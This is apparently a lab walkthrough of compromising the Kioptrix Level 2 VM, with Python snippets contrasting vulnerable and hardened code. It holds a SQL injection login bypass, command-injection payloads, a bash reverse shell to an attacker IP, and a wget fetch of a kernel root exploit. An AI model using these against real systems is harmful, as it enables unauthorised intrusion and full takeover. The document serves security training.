Information gathering

As before, netdiscover is used to find the target's IP address: 192.168.43.47.

Port scan with nmap:
```
root@kali:~# nmap -sS -A -T4 192.168.43.47
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-07 05:01 EDT
Nmap scan report for 192.168.43.47
Host is up (0.00047s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey:
|   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
|   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_  1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http        Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind     2 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1            841/udp  status
|_  100024  1            844/tcp  status
443/tcp  open  ssl/http    Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after:  2010-10-08T00:10:47
|_ssl-date: 2018-05-07T05:51:42+00:00; -3h09m44s from scanner time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|_    SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
631/tcp  open  ipp         CUPS 1.1
| http-methods:
|_  Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open  mysql       MySQL (unauthorized)
MAC Address: 00:0C:29:53:19:4C (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop

Host script results:
|_clock-skew: mean: -3h09m44s, deviation: 0s, median: -3h09m44s

TRACEROUTE
HOP RTT     ADDRESS
1   0.47 ms 192.168.43.47

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.46 seconds
```
Exploitation

Port 80/tcp is open, running Apache httpd 2.0.52 on CentOS. The scan also shows OpenSSH 3.9p1 still accepting SSHv1, SSLv2 enabled on 443 behind a self-signed certificate that expired in 2010, and CUPS 1.1 on 631 advertising PUT; all of these date the box, but the web application on port 80 is the path followed here.

Trying the universal password `' or 1=1#` in the login form succeeds: the single quote closes the string literal, `or 1=1` makes the WHERE clause true for every row, and `#` (a MySQL line comment; the scan shows MySQL on 3306) discards the rest of the query.
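To make the `' or 1=1#` bypass concrete, here is an added example (not code from the original post and not the target application's source, which the post does not show) of the login pattern such a payload defeats, beside a parameterised version of the same check. It uses sqlite3 so it runs offline; sqlite's line comment is `-- ` rather than MySQL's `#`, so the payload is written with `-- `, but the mechanism is identical. The table contents are constructed demo data.

```python
import sqlite3


def make_db():
    """Constructed demo data, not accounts from the target."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('admin', 'S3cr3t!')")
    return con


def vulnerable_login(con, username, password):
    """Builds the query by string concatenation, so user input becomes SQL."""
    query = ("SELECT username FROM users WHERE username='%s' AND password='%s'"
             % (username, password))
    row = con.execute(query).fetchone()
    return row[0] if row else None


def safe_login(con, username, password):
    """Binds the input as parameters: quotes and comment markers stay data."""
    row = con.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


# The post's MySQL payload is  ' or 1=1#   ('#' comments out the rest of the line).
# sqlite3 has no '#' comment, so the offline equivalent is  ' or 1=1--
BYPASS = "' or 1=1-- "

if __name__ == "__main__":
    con = make_db()
    # Payload in the username field: WHERE username='' or 1=1-- ' AND password='x'
    print(vulnerable_login(con, BYPASS, "anything"))
    # Payload in the password field: (username='nobody' AND password='') OR 1=1
    print(vulnerable_login(con, "nobody", BYPASS))
    # Parameterised query: the payload is just a string that matches nobody
    print(safe_login(con, BYPASS, "anything"))
```

Because `AND` binds tighter than `OR`, the payload works from either field: the whole predicate collapses to `... OR 1=1`, and the first row of the table (here the admin account) is returned as the authenticated user.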
After logging in there is a text box that runs a ping command against the host you enter. That is the classic shape of an OS command injection vulnerability: the input is pasted into a shell command line.

The shell separators that matter for command injection are `|`, `&&`, `||` and `;`. Their semantics, demonstrated locally on the attacking machine:
```
root@kali:~# whoai||id    # ||: command 2 runs only if command 1 fails (here "whoai" is deliberately misspelled)
bash: whoai: command not found
uid=0(root) gid=0(root) groups=0(root)
root@kali:~# whoami|id    # |: both run; whoami's stdout is piped into id, which ignores it, so only id's output appears
uid=0(root) gid=0(root) groups=0(root)
root@kali:~# whoami;id    # ;: run in sequence regardless of exit status
root
uid=0(root) gid=0(root) groups=0(root)
root@kali:~# whoami&&id   # &&: command 2 runs only if command 1 exits 0 (success)
root
uid=0(root) gid=0(root) groups=0(root)
```
Here `|` or `;` can be appended to the host field to run our own command. Test it with `cat /etc/passwd`.
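The ping box above is the textbook form of OS command injection. As an added example (not the target's own code, which the post does not show), the Python below reproduces that pattern with `shell=True`, shows the `;`, `|` and `&&` separators from the post taking effect, and places the fix beside it: validate the host as a literal IP address and pass an argv list with no shell. The `base` parameter exists only so the demo can substitute `echo` for a real `ping` and run without network access; the `PING` default is an assumption about what the target's form runs.

```python
import ipaddress
import subprocess

# Assumed shape of the command behind the target's ping box.
PING = ["ping", "-c", "1"]


def vulnerable_run(host, base=PING):
    """The injectable pattern: the user string is spliced into a shell
    command line, so ; | && || end the ping and start attacker commands."""
    cmdline = " ".join(base) + " " + host
    return subprocess.run(cmdline, shell=True,
                          capture_output=True, text=True).stdout


def is_valid_host(host):
    """Allow-list check: only a literal IPv4/IPv6 address is accepted.
    Every shell metacharacter fails this parse, so none reaches a shell."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def hardened_run(host, base=PING):
    """Validated input plus argv-list execution (no shell). Even if a
    metacharacter slipped past validation, execve() would hand it to the
    program as one plain argument rather than to /bin/sh."""
    if not is_valid_host(host):
        raise ValueError("rejected host: %r" % host)
    return subprocess.run([*base, host], capture_output=True, text=True).stdout


if __name__ == "__main__":
    # Constructed payloads in the style of the post's injection; echo stands
    # in for ping so the demo needs neither raw sockets nor a network.
    print(vulnerable_run("127.0.0.1; echo INJECTED", base=["echo"]))
    print(vulnerable_run("127.0.0.1 | echo INJECTED", base=["echo"]))
    print(is_valid_host("127.0.0.1; echo INJECTED"))
    print(hardened_run("127.0.0.1", base=["echo"]))
```

With `;` both commands run and both outputs come back; with `|` the first command's output is swallowed by the second, which is why the pipe variant on the target shows only the injected command's output. The hardened version refuses the payload before any process is spawned.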
Next, use the command injection to get an interactive shell back:

```
;bash -i >& /dev/tcp/192.168.43.177/2333 0>&1
```

`>&` sends the shell's stdout and stderr to the TCP socket that bash opens for `/dev/tcp/HOST/PORT`, and `0>&1` takes stdin from the same socket. Note that the redirection is interpreted by the shell running the injected line, not by the inner `bash -i`; `/dev/tcp` is a bash feature, so if `/bin/sh` on a target is dash rather than bash, wrap the whole thing as `bash -c 'bash -i >& /dev/tcp/192.168.43.177/2333 0>&1'`.

At the same time, listen on port 2333 with nc on the attacking machine (192.168.43.177):

```
nc -lvnp 2333
```

This gives an interactive shell, but as the apache user.
Privilege escalation

The current user is apache; we need to escalate to root.
```
bash-3.00$ uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
```
Check the kernel version with `uname -a`, then search for a matching local privilege-escalation exploit with `searchsploit linux 2.6.9`. The exploit used is 9542.c: https://www.exploit-db.com/download/9542.c

The exploit is served from a web server on the attacking machine, fetched onto the target with wget, and compiled there with the gcc already installed on the box:
```
bash-3.00$ cd /tmp
bash-3.00$ wget http://192.168.43.177/9542.c
--03:06:55--  http://192.168.43.177/9542.c
           => `9542.c'
Connecting to 192.168.43.177:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,645 (2.6K) [text/x-csrc]

    0K ..                                                    100%  252.25 MB/s

03:06:55 (252.25 MB/s) - `9542.c' saved [2645/2645]

bash-3.00$ gcc -o 9542 9542.c
bash-3.00$ ./9542
sh: no job control in this shell
sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)
sh-3.00# whoami
root
```
Privilege escalation succeeded: uid 0, with the original apache group still attached to the process, as the `id` output shows. Kernel exploits of this kind can crash the target when they fail, so on a lab VM take a snapshot before running one.